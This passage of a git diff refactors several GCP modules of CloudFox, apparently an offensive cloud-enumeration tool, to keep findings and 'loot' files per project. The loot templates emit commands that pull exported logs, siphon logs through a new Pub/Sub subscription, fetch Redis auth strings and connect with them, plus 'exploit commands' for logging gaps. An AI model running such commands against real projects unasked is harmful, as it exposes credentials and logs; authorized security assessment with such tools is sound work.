getAllSinks() []LoggingService.SinkInfo { + var all []LoggingService.SinkInfo + for _, sinks := range m.ProjectSinks { + all = append(all, sinks...) + } + return all +} + +// getAllMetrics returns all metrics from all projects +func (m *LoggingModule) getAllMetrics() []LoggingService.MetricInfo { + var all []LoggingService.MetricInfo + for _, metrics := range m.ProjectMetrics { + all = append(all, metrics...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -129,6 +149,9 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo ls := LoggingService.New() + var projectSinks []LoggingService.SinkInfo + var projectMetrics []LoggingService.MetricInfo + // Get sinks sinks, err := ls.Sinks(projectID) if err != nil { @@ -136,12 +159,7 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, fmt.Sprintf("Could not enumerate logging sinks in project %s", projectID)) } else { - m.mu.Lock() - m.Sinks = append(m.Sinks, sinks...) - for _, sink := range sinks { - m.addSinkToLoot(sink) - } - m.mu.Unlock() + projectSinks = append(projectSinks, sinks...) } // Get metrics @@ -151,46 +169,59 @@ func (m *LoggingModule) processProject(ctx context.Context, projectID string, lo gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, fmt.Sprintf("Could not enumerate log metrics in project %s", projectID)) } else { - m.mu.Lock() - m.Metrics = append(m.Metrics, metrics...) - for _, metric := range metrics { - m.addMetricToLoot(metric) + projectMetrics = append(projectMetrics, metrics...) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectSinks[projectID] = projectSinks + m.ProjectMetrics[projectID] = projectMetrics + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["sinks-commands"] = &internal.LootFile{ + Name: "sinks-commands", + Contents: "# Cloud Logging Sinks Commands\n# Generated by CloudFox\n\n", + } + m.LootMap[projectID]["sinks-cross-project"] = &internal.LootFile{ + Name: "sinks-cross-project", + Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", + } + m.LootMap[projectID]["sinks-writer-identities"] = &internal.LootFile{ + Name: "sinks-writer-identities", + Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", } - m.mu.Unlock() + m.LootMap[projectID]["metrics-commands"] = &internal.LootFile{ + Name: "metrics-commands", + Contents: "# Cloud Logging Metrics Commands\n# Generated by CloudFox\n\n", + } + } + + for _, sink := range projectSinks { + m.addSinkToLoot(projectID, sink) } + for _, metric := range projectMetrics { + m.addMetricToLoot(projectID, metric) + } + m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s) in project %s", len(sinks), len(metrics), projectID), globals.GCP_LOGGING_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s) in project %s", len(projectSinks), len(projectMetrics), projectID), globals.GCP_LOGGING_MODULE_NAME) } } // ------------------------------ // Loot File Management // ------------------------------ -func (m *LoggingModule) initializeLootFiles() { - // Sinks loot files - m.LootMap["sinks-commands"] = &internal.LootFile{ - Name: "sinks-commands", - Contents: "# Cloud Logging Sinks Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["sinks-cross-project"] = &internal.LootFile{ - Name: "sinks-cross-project", - Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", - } - m.LootMap["sinks-writer-identities"] = &internal.LootFile{ - Name: "sinks-writer-identities", - Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", - } - // Metrics loot files - m.LootMap["metrics-commands"] = &internal.LootFile{ - Name: "metrics-commands", - Contents: "# Cloud Logging Metrics Commands\n# Generated by CloudFox\n\n", +func (m *LoggingModule) addSinkToLoot(projectID string, sink LoggingService.SinkInfo) { + lootFile := m.LootMap[projectID]["sinks-commands"] + if lootFile == nil { + return } -} -func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { // Sinks commands file - m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Sink: %s (Project: %s)\n"+ "# Destination: %s (%s)\n"+ "gcloud logging sinks describe %s --project=%s\n", @@ -203,7 +234,7 @@ func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { switch sink.DestinationType { case "storage": if sink.DestinationBucket != "" { - m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gsutil ls gs://%s/\n"+ "gsutil cat gs://%s/**/*.json 2>/dev/null | head -100\n", sink.DestinationBucket, sink.DestinationBucket, @@ -215,7 +246,7 @@ func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { if destProject == "" { destProject = sink.ProjectID } - m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "bq ls %s:%s\n"+ "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n", destProject, sink.DestinationDataset, @@ -228,52 +259,62 @@ func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { if destProject == "" { destProject = sink.ProjectID } - m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n", sink.DestinationTopic, destProject, destProject, ) } } - m.LootMap["sinks-commands"].Contents += "\n" + lootFile.Contents += "\n" // Cross-project exports if sink.IsCrossProject { - filter := sink.Filter - if filter == "" { - filter = "(no filter - all logs)" + crossProjectLoot := m.LootMap[projectID]["sinks-cross-project"] + if crossProjectLoot != nil { + filter := sink.Filter + if filter == "" { + filter = "(no filter - all logs)" + } + crossProjectLoot.Contents += fmt.Sprintf( + "# Sink: %s\n"+ + "# Source Project: %s\n"+ + "# Destination Project: %s\n"+ + "# Destination Type: %s\n"+ + "# Destination: %s\n"+ + "# Filter: %s\n"+ + "# Writer Identity: %s\n\n", + sink.Name, + sink.ProjectID, + sink.DestinationProject, + sink.DestinationType, + sink.Destination, + filter, + sink.WriterIdentity, + ) } - m.LootMap["sinks-cross-project"].Contents += fmt.Sprintf( - "# Sink: %s\n"+ - "# Source Project: %s\n"+ - "# Destination Project: %s\n"+ - "# Destination Type: %s\n"+ - "# Destination: %s\n"+ - "# Filter: %s\n"+ - "# Writer Identity: %s\n\n", - sink.Name, - sink.ProjectID, - sink.DestinationProject, - sink.DestinationType, - sink.Destination, - filter, - sink.WriterIdentity, - ) } // Writer identities if sink.WriterIdentity != "" { - m.LootMap["sinks-writer-identities"].Contents += fmt.Sprintf( - "# Sink: %s -> %s (%s)\n"+ - "%s\n\n", - sink.Name, sink.DestinationType, getDestinationName(sink), - sink.WriterIdentity, - ) + writerLoot := m.LootMap[projectID]["sinks-writer-identities"] + if writerLoot != nil { + writerLoot.Contents += fmt.Sprintf( + "# Sink: %s -> %s (%s)\n"+ + "%s\n\n", + sink.Name, sink.DestinationType, getDestinationName(sink), + sink.WriterIdentity, + ) + } } } -func (m *LoggingModule) addMetricToLoot(metric LoggingService.MetricInfo) { - m.LootMap["metrics-commands"].Contents += fmt.Sprintf( +func (m *LoggingModule) addMetricToLoot(projectID string, metric LoggingService.MetricInfo) { + lootFile := m.LootMap[projectID]["metrics-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# Metric: %s (Project: %s)\n"+ "gcloud logging metrics describe %s --project=%s\n\n", metric.Name, metric.ProjectID, @@ -285,8 +326,16 @@ func (m *LoggingModule) addMetricToLoot(metric LoggingService.MetricInfo) { // Output Generation // ------------------------------ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sinks table - sinksHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getSinksHeader returns the header for sinks table +func (m *LoggingModule) getSinksHeader() []string { + return []string{ "Project Name", "Project ID", "Sink Name", @@ -297,9 +346,24 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) "Writer Identity", "Filter", } +} + +// getMetricsHeader returns the header for metrics table +func (m *LoggingModule) getMetricsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Metric Name", + "Description", + "Filter", + "Type", + } +} - var sinksBody [][]string - for _, sink := range m.Sinks { +// sinksToTableBody converts sinks to table body rows +func (m *LoggingModule) sinksToTableBody(sinks []LoggingService.SinkInfo) [][]string { + var body [][]string + for _, sink := range sinks { // Format destination destination := getDestinationName(sink) @@ -327,7 +391,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) writerIdentity = sink.WriterIdentity } - sinksBody = append(sinksBody, []string{ + body = append(body, []string{ m.GetProjectName(sink.ProjectID), sink.ProjectID, sink.Name, @@ -339,19 +403,13 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) filter, }) } + return body +} - // Metrics table - metricsHeader := []string{ - "Project Name", - "Project ID", - "Metric Name", - "Description", - "Filter", - "Type", - } - - var metricsBody [][]string - for _, metric := range m.Metrics { +// metricsToTableBody converts metrics to table body rows +func (m *LoggingModule) metricsToTableBody(metrics []LoggingService.MetricInfo) [][]string { + var body [][]string + for _, metric := range metrics { // Format filter (no truncation) filter := "-" if metric.Filter != "" { @@ -370,7 +428,7 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) description = "-" } - metricsBody = append(metricsBody, []string{ + body = append(body, []string{ m.GetProjectName(metric.ProjectID), metric.ProjectID, metric.Name, @@ -379,34 +437,123 @@ func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) metricType, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) +// buildTablesForProject builds table files for a project +func (m *LoggingModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if sinks, ok := m.ProjectSinks[projectID]; ok && len(sinks) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: m.getSinksHeader(), + Body: m.sinksToTableBody(sinks), + }) + } + + if metrics, ok := m.ProjectMetrics[projectID]; ok && len(metrics) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: m.getMetricsHeader(), + Body: m.metricsToTableBody(metrics), + }) + } + + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *LoggingModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectSinks { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LoggingOutput{Table: tableFiles, Loot: lootFiles} + } + + // Also add projects that only have metrics + for projectID := range m.ProjectMetrics { + if _, exists := outputData.ProjectLevelData[projectID]; !exists { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LoggingOutput{Table: tableFiles, Loot: lootFiles} } } + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *LoggingModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allSinks := m.getAllSinks() + allMetrics := m.getAllMetrics() + // Build table files tableFiles := []internal.TableFile{} - if len(sinksBody) > 0 { + if len(allSinks) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", - Header: sinksHeader, - Body: sinksBody, + Header: m.getSinksHeader(), + Body: m.sinksToTableBody(allSinks), }) } - if len(metricsBody) > 0 { + if len(allMetrics) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", - Header: metricsHeader, - Body: metricsBody, + Header: m.getMetricsHeader(), + Body: m.metricsToTableBody(allMetrics), }) } + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := LoggingOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go index 3aa77b7d..ec37013b 100644 --- a/gcp/commands/logginggaps.go +++ b/gcp/commands/logginggaps.go @@ -51,10 +51,10 @@ Stealth Value Ratings: type LoggingGapsModule struct { gcpinternal.BaseGCPModule - Gaps []logginggapsservice.LoggingGap - AuditConfigs []*logginggapsservice.AuditLogConfig - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectGaps map[string][]logginggapsservice.LoggingGap // projectID -> gaps + ProjectAuditConfigs map[string]*logginggapsservice.AuditLogConfig // projectID -> audit config + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -78,13 +78,12 @@ func runGCPLoggingGapsCommand(cmd *cobra.Command, args []string) { } module := &LoggingGapsModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Gaps: []logginggapsservice.LoggingGap{}, - AuditConfigs: []*logginggapsservice.AuditLogConfig{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectGaps: make(map[string][]logginggapsservice.LoggingGap), + ProjectAuditConfigs: make(map[string]*logginggapsservice.AuditLogConfig), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -94,16 +93,25 @@ func runGCPLoggingGapsCommand(cmd *cobra.Command, args []string) { func (m *LoggingGapsModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGGAPS_MODULE_NAME, m.processProject) - if len(m.Gaps) == 0 { + allGaps := m.getAllGaps() + if len(allGaps) == 0 { logger.InfoM("No logging gaps found", globals.GCP_LOGGINGGAPS_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(m.Gaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(allGaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *LoggingGapsModule) getAllGaps() []logginggapsservice.LoggingGap { + var all []logginggapsservice.LoggingGap + for _, gaps := range m.ProjectGaps { + all = append(all, gaps...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -112,6 +120,17 @@ func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string logger.InfoM(fmt.Sprintf("Scanning logging gaps in project: %s", projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["logging-gaps-commands"] = &internal.LootFile{ + Name: "logging-gaps-commands", + Contents: "# Logging Gaps Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + svc := logginggapsservice.New() gaps, auditConfig, err := svc.EnumerateLoggingGaps(projectID) if err != nil { @@ -122,13 +141,13 @@ func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string } m.mu.Lock() - m.Gaps = append(m.Gaps, gaps...) + m.ProjectGaps[projectID] = gaps if auditConfig != nil { - m.AuditConfigs = append(m.AuditConfigs, auditConfig) + m.ProjectAuditConfigs[projectID] = auditConfig } for _, gap := range gaps { - m.addGapToLoot(gap) + m.addGapToLoot(projectID, gap) } m.mu.Unlock() @@ -140,15 +159,12 @@ func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string // ------------------------------ // Loot File Management // ------------------------------ -func (m *LoggingGapsModule) initializeLootFiles() { - m.LootMap["logging-gaps-commands"] = &internal.LootFile{ - Name: "logging-gaps-commands", - Contents: "# Logging Gaps Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *LoggingGapsModule) addGapToLoot(projectID string, gap logginggapsservice.LoggingGap) { + lootFile := m.LootMap[projectID]["logging-gaps-commands"] + if lootFile == nil { + return } -} - -func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { - m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## %s: %s (Project: %s, Location: %s)\n"+ "# Status: %s\n"+ "# Missing:\n", @@ -157,16 +173,16 @@ func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { gap.LoggingStatus, ) for _, missing := range gap.MissingLogs { - m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf("# - %s\n", missing) + lootFile.Contents += fmt.Sprintf("# - %s\n", missing) } - m.LootMap["logging-gaps-commands"].Contents += "\n" + lootFile.Contents += "\n" // Add exploit commands if len(gap.ExploitCommands) > 0 { for _, cmd := range gap.ExploitCommands { - m.LootMap["logging-gaps-commands"].Contents += cmd + "\n" + lootFile.Contents += cmd + "\n" } - m.LootMap["logging-gaps-commands"].Contents += "\n" + lootFile.Contents += "\n" } } @@ -174,7 +190,15 @@ func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { // Output Generation // ------------------------------ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LoggingGapsModule) getHeader() []string { + return []string{ "Project ID", "Project Name", "Type", @@ -183,9 +207,11 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log "Status", "Missing Logs", } +} +func (m *LoggingGapsModule) gapsToTableBody(gaps []logginggapsservice.LoggingGap) [][]string { var body [][]string - for _, gap := range m.Gaps { + for _, gap := range gaps { missingLogs := strings.Join(gap.MissingLogs, "; ") location := gap.Location @@ -203,21 +229,72 @@ func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Log missingLogs, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *LoggingGapsModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if gaps, ok := m.ProjectGaps[projectID]; ok && len(gaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "logging-gaps", + Header: m.getHeader(), + Body: m.gapsToTableBody(gaps), + }) + } + + return tableFiles +} + +func (m *LoggingGapsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectGaps { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = LoggingGapsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGGINGGAPS_MODULE_NAME) } +} + +func (m *LoggingGapsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allGaps := m.getAllGaps() + + var tables []internal.TableFile - tables := []internal.TableFile{ - { + if len(allGaps) > 0 { + tables = append(tables, internal.TableFile{ Name: "logging-gaps", - Header: header, - Body: body, - }, + Header: m.getHeader(), + Body: m.gapsToTableBody(allGaps), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } output := LoggingGapsOutput{ diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 6defdb06..3d57561d 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -29,9 +29,9 @@ Features: type MemorystoreModule struct { gcpinternal.BaseGCPModule - RedisInstances []memorystoreservice.RedisInstanceInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectInstances map[string][]memorystoreservice.RedisInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type MemorystoreOutput struct { @@ -49,36 +49,43 @@ func runGCPMemorystoreCommand(cmd *cobra.Command, args []string) { } module := &MemorystoreModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - RedisInstances: []memorystoreservice.RedisInstanceInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]memorystoreservice.RedisInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *MemorystoreModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_MEMORYSTORE_MODULE_NAME, m.processProject) - if len(m.RedisInstances) == 0 { + allInstances := m.getAllInstances() + if len(allInstances) == 0 { logger.InfoM("No Memorystore instances found", globals.GCP_MEMORYSTORE_MODULE_NAME) return } noAuth := 0 - for _, instance := range m.RedisInstances { + for _, instance := range allInstances { if !instance.AuthEnabled { noAuth++ } } logger.SuccessM(fmt.Sprintf("Found %d Redis instance(s) (%d without auth)", - len(m.RedisInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) + len(allInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *MemorystoreModule) getAllInstances() []memorystoreservice.RedisInstanceInfo { + var all []memorystoreservice.RedisInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + func (m *MemorystoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating Memorystore in project: %s", projectID), globals.GCP_MEMORYSTORE_MODULE_NAME) @@ -94,22 +101,29 @@ func (m *MemorystoreModule) processProject(ctx context.Context, projectID string } m.mu.Lock() - m.RedisInstances = append(m.RedisInstances, instances...) + m.ProjectInstances[projectID] = instances + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["memorystore-commands"] = &internal.LootFile{ + Name: "memorystore-commands", + Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + for _, instance := range instances { - m.addInstanceToLoot(instance) + m.addInstanceToLoot(projectID, instance) } m.mu.Unlock() } -func (m *MemorystoreModule) initializeLootFiles() { - m.LootMap["memorystore-commands"] = &internal.LootFile{ - Name: "memorystore-commands", - Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *MemorystoreModule) addInstanceToLoot(projectID string, instance memorystoreservice.RedisInstanceInfo) { + lootFile := m.LootMap[projectID]["memorystore-commands"] + if lootFile == nil { + return } -} - -func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisInstanceInfo) { - m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Instance: %s (Project: %s, Location: %s)\n"+ "# Host: %s:%d\n"+ "# Auth: %v, Encryption: %s\n\n", @@ -119,7 +133,7 @@ func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisI ) // gcloud commands - m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Describe instance:\n"+ "gcloud redis instances describe %s --region=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, @@ -127,7 +141,7 @@ func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisI // Auth string command (if auth enabled) if instance.AuthEnabled { - m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Get auth string:\n"+ "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", instance.Name, instance.Location, instance.ProjectID, @@ -141,7 +155,7 @@ func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisI " --region=" + instance.Location + " --project=" + instance.ProjectID + " --format='value(authString)')" } - m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Connect to Redis (from a VM in the same VPC):\n"+ "redis-cli -h %s -p %d%s\n\n", instance.Host, instance.Port, authStr, @@ -161,7 +175,15 @@ func extractNetworkName(network string) string { } func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *MemorystoreModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -176,9 +198,11 @@ func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Log "Network", "Connect Mode", } +} +func (m *MemorystoreModule) instancesToTableBody(instances []memorystoreservice.RedisInstanceInfo) [][]string { var body [][]string - for _, instance := range m.RedisInstances { + for _, instance := range instances { transitEncryption := instance.TransitEncryption if transitEncryption == "" { transitEncryption = "DISABLED" @@ -199,16 +223,53 @@ func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Log instance.ConnectMode, }) } + return body +} - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *MemorystoreModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tableFiles := []internal.TableFile{{Name: "memorystore", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = MemorystoreOutput{Table: tableFiles, Loot: lootFiles} } - tables := []internal.TableFile{{Name: "memorystore", Header: header, Body: body}} + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} + +func (m *MemorystoreModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + tables := []internal.TableFile{{Name: "memorystore", Header: m.getTableHeader(), Body: body}} output := MemorystoreOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go index 22206e00..bcbd8f44 100644 --- a/gcp/commands/monitoringalerts.go +++ b/gcp/commands/monitoringalerts.go @@ -112,11 +112,11 @@ type UptimeCheck struct { type MonitoringAlertsModule struct { gcpinternal.BaseGCPModule - 